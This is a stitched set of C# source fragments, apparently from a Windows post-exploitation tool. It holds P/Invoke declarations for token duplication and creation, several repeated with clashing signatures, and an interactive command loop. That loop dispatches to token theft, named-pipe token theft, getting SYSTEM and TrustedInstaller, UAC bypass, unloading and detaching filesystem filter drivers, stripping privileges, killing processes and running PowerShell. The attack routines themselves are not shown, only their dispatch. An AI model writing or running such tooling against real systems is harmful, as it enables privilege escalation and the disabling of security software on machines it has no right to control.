public static extern UInt32 NtDuplicateToken( IntPtr ExistingTokenHandle, Winnt.ACCESS_MASK DesiredAccess, wudfwdm._OBJECT_ATTRIBUTES ObjectAttributes, Boolean EffectiveOnly, Winnt._TOKEN_TYPE TokenType, ref IntPtr NewTokenHandle );
public static extern UInt32 NtDuplicateToken( IntPtr ExistingTokenHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, Boolean EffectiveOnly, Winnt._TOKEN_TYPE TokenType, ref IntPtr NewTokenHandle );
public static extern uint NtDuplicateToken( IntPtr ExistingTokenHandle, uint DesiredAccess, IntPtr ObjectAttributes, bool EffectiveOnly, Winnt._TOKEN_TYPE TokenType, ref IntPtr NewTokenHandle );
//////////////////////////////////////////////////////////////////////////////// //https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/ //////////////////////////////////////////////////////////////////////////////// public static bool GetElevationType(IntPtr hToken, out Winnt._TOKEN_TYPE tokenType) { int output = -1; if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenType, ref output)) { Misc.GetWin32Error("TokenType"); tokenType = 0; return(false); } switch ((Winnt._TOKEN_TYPE)output) { case Winnt._TOKEN_TYPE.TokenPrimary: Console.WriteLine("[+] Primary Token"); tokenType = Winnt._TOKEN_TYPE.TokenPrimary; return(true); case Winnt._TOKEN_TYPE.TokenImpersonation: tokenType = Winnt._TOKEN_TYPE.TokenImpersonation; if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, ref output)) { return(false); } switch ((Winnt._SECURITY_IMPERSONATION_LEVEL)output) { case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous: Console.WriteLine("[+] Anonymous Token"); return(true); case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityIdentification: Console.WriteLine("[+] Identification Token"); return(true); case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation: Console.WriteLine("[+] Impersonation Token"); return(true); case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityDelegation: Console.WriteLine("[+] Delegation Token"); return(true); default: Console.WriteLine("[-] Unknown Impersionation Type"); return(false); } default: Console.WriteLine("[-] Unknown Type {0}", output); tokenType = 0; return(false); } }
public static extern uint NtCreateToken( out IntPtr TokenHandle, uint DesiredAccess, IntPtr ObjectAttributes, Winnt._TOKEN_TYPE TokenType, IntPtr AuthenticationId, //From NtAllocateLocallyUniqueId ref long ExpirationTime, IntPtr TokenUser, IntPtr TokenGroups, IntPtr TokenPrivileges, IntPtr TokenOwner, IntPtr TokenPrimaryGroup, IntPtr TokenDefaultDacl, IntPtr TokenSource );
public static extern uint NtCreateToken( out IntPtr TokenHandle, uint DesiredAccess, ref wudfwdm._OBJECT_ATTRIBUTES ObjectAttributes, Winnt._TOKEN_TYPE TokenType, ref Winnt._LUID AuthenticationId, //From NtAllocateLocallyUniqueId ref long ExpirationTime, ref Ntifs._TOKEN_USER TokenUser, ref Ntifs._TOKEN_GROUPS_DYNAMIC TokenGroups, ref Winnt._TOKEN_PRIVILEGES_ARRAY TokenPrivileges, ref Ntifs._TOKEN_OWNER TokenOwner, ref Winnt._TOKEN_PRIMARY_GROUP TokenPrimaryGroup, ref Winnt._TOKEN_DEFAULT_DACL TokenDefaultDacl, ref Winnt._TOKEN_SOURCE TokenSource );
public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, ref Winbase._SECURITY_ATTRIBUTES lpTokenAttributes, Winnt._SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, Winnt._TOKEN_TYPE TokenType, out IntPtr phNewToken);
public static extern Boolean DuplicateTokenEx(IntPtr hExistingToken, UInt32 dwDesiredAccess, IntPtr lpTokenAttributes, Winnt._SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, Winnt._TOKEN_TYPE TokenType, out IntPtr phNewToken);
internal void Run() { try { Console.Write(context); String input; if (activateTabs) { try { input = console.ReadLine(); } catch (InvalidOperationException) { input = Console.ReadLine(); } } else { input = Console.ReadLine(); } IntPtr hToken, tempToken; hToken = tempToken = IntPtr.Zero; kernel32.OpenProcessToken(kernel32.GetCurrentProcess(), Constants.TOKEN_ALL_ACCESS, out hToken); switch (NextItem(ref input)) { case "info": if (GetProcessID(input, out processID, out command) && OpenToken(processID, ref tempToken)) { hToken = tempToken; } Console.WriteLine(""); CheckPrivileges.GetTokenUser(hToken); Console.WriteLine(""); CheckPrivileges.GetTokenOwner(hToken); Console.WriteLine(""); CheckPrivileges.GetTokenGroups(hToken); Console.WriteLine(""); Winnt._TOKEN_TYPE tokenType = new Winnt._TOKEN_TYPE(); CheckPrivileges.GetElevationType(hToken, out tokenType); CheckPrivileges.PrintElevation(hToken); break; case "list_privileges": if (GetProcessID(input, out processID, out command)) { if (OpenToken(processID, ref tempToken)) { hToken = tempToken; } else { break; } } Tokens.EnumerateTokenPrivileges(hToken); break; case "enable_privilege": if (GetProcessID(input, out processID, out command)) { if (OpenToken(processID, ref tempToken)) { hToken = tempToken; } else { break; } } Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED); break; case "disable_privilege": if (GetProcessID(input, out processID, out command)) { if (OpenToken(processID, ref tempToken)) { hToken = tempToken; } else { break; } } Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_NONE); break; case "remove_privilege": if (GetProcessID(input, out processID, out command)) { if (OpenToken(processID, ref tempToken)) { hToken = tempToken; } else { break; } } Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED); break; case "nuke_privileges": if (GetProcessID(input, out processID, out command)) { if (OpenToken(processID, ref tempToken)) { hToken = tempToken; } else { break; } } Tokens.DisableAndRemoveAllTokenPrivileges(ref hToken); break; case "terminate": if (GetProcessID(input, out processID, out command)) { IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_TERMINATE, false, (UInt32)processID); if (IntPtr.Zero == hProcess) { Tokens.GetWin32Error("OpenProcess"); break; } Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4")); if (!kernel32.TerminateProcess(hProcess, 0)) { Tokens.GetWin32Error("TerminateProcess"); break; } Console.WriteLine("[+] Process Terminated"); } break; case "sample_processes": users = Enumeration.EnumerateTokens(false); Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name"); Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------"); foreach (String name in users.Keys) { Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName); } break; case "sample_processes_wmi": users = Enumeration.EnumerateTokensWMI(); Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name"); Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------"); foreach (String name in users.Keys) { Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName); } break; case "find_user_processes": processes = Enumeration.EnumerateUserProcesses(false, input); Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name"); Console.WriteLine("{0,-30}{1,-30}", "----------", "------------"); foreach (UInt32 pid in processes.Keys) { Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]); } break; case "find_user_processes_wmi": processes = Enumeration.EnumerateUserProcessesWMI(input); Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name"); Console.WriteLine("{0,-30}{1,-30}", "----------", "------------"); foreach (UInt32 pid in processes.Keys) { Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]); } break; case "list_filters": using (Filters filters = new Filters()) { filters.First(); filters.Next(); } break; case "list_filter_instances": using (FilterInstance filterInstance = new FilterInstance(NextItem(ref input))) { filterInstance.First(); filterInstance.Next(); } break; case "detach_filter": Filters.FilterDetach(input); break; case "unload_filter": Filters.Unload(NextItem(ref input)); break; case "sessions": Enumeration.EnumerateInteractiveUserSessions(); break; case "getsystem": GetSystem(input, hToken); break; case "gettrustedinstaller": GetTrustedInstaller(input); break; case "steal_token": StealToken(input); break; case "steal_pipe_token": StealPipeToken(input); break; case "bypassuac": BypassUAC(input); break; case "whoami": Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name); break; case "reverttoself": String message = advapi32.RevertToSelf() ? "[*] Reverted token to " + WindowsIdentity.GetCurrent().Name : "[-] RevertToSelf failed"; Console.WriteLine(message); break; case "run": Run(input); break; case "runpowershell": RunPowerShell(input); break; case "exit": Environment.Exit(0); break; case "help": String item = NextItem(ref input); if ("help" != item) { Help(item); } else { Help(); } break; default: Help(); break; } if (IntPtr.Zero != hToken) { kernel32.CloseHandle(hToken); } Console.WriteLine(); } catch (Exception error) { Console.WriteLine(error.ToString()); Tokens.GetWin32Error("MainLoop"); } finally { } }